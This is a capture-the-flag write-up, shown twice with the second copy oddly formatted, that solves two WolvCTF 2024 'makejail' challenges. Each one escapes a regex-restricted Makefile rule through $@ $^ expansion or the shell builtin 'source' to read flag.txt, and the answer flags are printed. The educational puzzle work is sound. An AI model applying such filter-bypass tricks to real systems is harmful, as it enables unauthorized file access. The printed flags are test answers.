u.twoha.cc/ctf/wolvctf/misc_made.md

---
title: 'WolvCTF 2024 - Misc: Made Harder / Misc: Made With Love'
date: 2024-03-20
tags: ['ctf', 'ctf-misc']
---
## Task

> the third makejail
>
> [https://madeharder-okntin33tq-ul.a.run.app](https://madeharder-okntin33tq-ul.a.run.app)

> the final makejail
>
> [https://madewithlove-okntin33tq-ul.a.run.app](https://madewithlove-okntin33tq-ul.a.run.app)

- `Author: doubledelete`
- `Points: 181, 277`
- `Solves: 68, 57 / 622 (10.932%, 9.164%)`

## Writeup

In `Made Harder`, we can add a single rule to a Makefile, with the restriction that our target name matches `[A-Za-z0-9]+` and our code matches `[\!\@\#\$\%\^\&\*\(\)\[\]\{\}\<\> ]+`.

Then, the following Makefile is generated and our target is run:

```make
SHELL := /bin/bash
.PHONY: {name}
{name}: flag.txt
    {content}
```

We can use the `$@` and `$^` Makefile variables to specify the target name and dependencies respectively, while still following the regex.

Therefore, we can set the target name to `cat` and the code to `$@ $^`, which will expand to `cat flag.txt`, getting us the flag:

```
stdout:
b'cat flag.txt\nwctf{s0_m4ny_v4r14bl35}\n'
stderr:
b''
```

In `Made With Love`, the only difference is that the PATH variable is cleared, so we cannot run `cat`. We also cannot use `/bin/cat` since `/` will not match the regex.

Instead we can use the shell builtin `source`, which will try to run `flag.txt` as a shell script, giving us the flag:

```
stdout:
b'source flag.txt\n'
stderr:
b'flag.txt: line 1: wctf{m4d3_w1th_l0v3_by_d0ubl3d3l3t3}: No such file or directory\nmake: *** [Makefile:5: source] Error 127\n'
```
yeah 2024-09-13 03:24:53 -04:00			`---`
			`title: 'WolvCTF 2024 - Misc: Made Harder / Misc: Made With Love'`
			`date: 2024-03-20`
			`tags: ['ctf', 'ctf-misc']`
			`---`
			`## Task`

			`> the third makejail`
			`>`
			`> [https://madeharder-okntin33tq-ul.a.run.app](https://madeharder-okntin33tq-ul.a.run.app)`

			`> the final makejail`
			`>`
			`> [https://madewithlove-okntin33tq-ul.a.run.app](https://madewithlove-okntin33tq-ul.a.run.app)`

			- `Author: doubledelete`
			- `Points: 181, 277`
			- `Solves: 68, 57 / 622 (10.932%, 9.164%)`

			`## Writeup`

			In `Made Harder`, we can add a single rule to a Makefile, with the restriction that our target name matches `[A-Za-z0-9]+` and our code matches `[\!\@\#\$\%\^\&\*\(\)\[\]\{\}\<\> ]+`.

			`Then, the following Makefile is generated and our target is run:`

			```make
			`SHELL := /bin/bash`
			`.PHONY: {name}`
			`{name}: flag.txt`
			`{content}`
			```

			We can use the `$@` and `$^` Makefile variables to specify the target name and dependencies respectively, while still following the regex.

			Therefore, we can set the target name to `cat` and the code to `$@ $^`, which will expand to `cat flag.txt`, getting us the flag:

			```
			`stdout:`
			`b'cat flag.txt\nwctf{s0_m4ny_v4r14bl35}\n'`
			`stderr:`
			`b''`
			```

			In `Made With Love`, the only difference is that the PATH variable is cleared, so we cannot run `cat`. We also cannot use `/bin/cat` since `/` will not match the regex.

			Instead we can use the shell builtin `source`, which will try to run `flag.txt` as a shell script, giving us the flag:

			```
			`stdout:`
			`b'source flag.txt\n'`
			`stderr:`
			`b'flag.txt: line 1: wctf{m4d3_w1th_l0v3_by_d0ubl3d3l3t3}: No such file or directory\nmake: *** [Makefile:5: source] Error 127\n'`
			```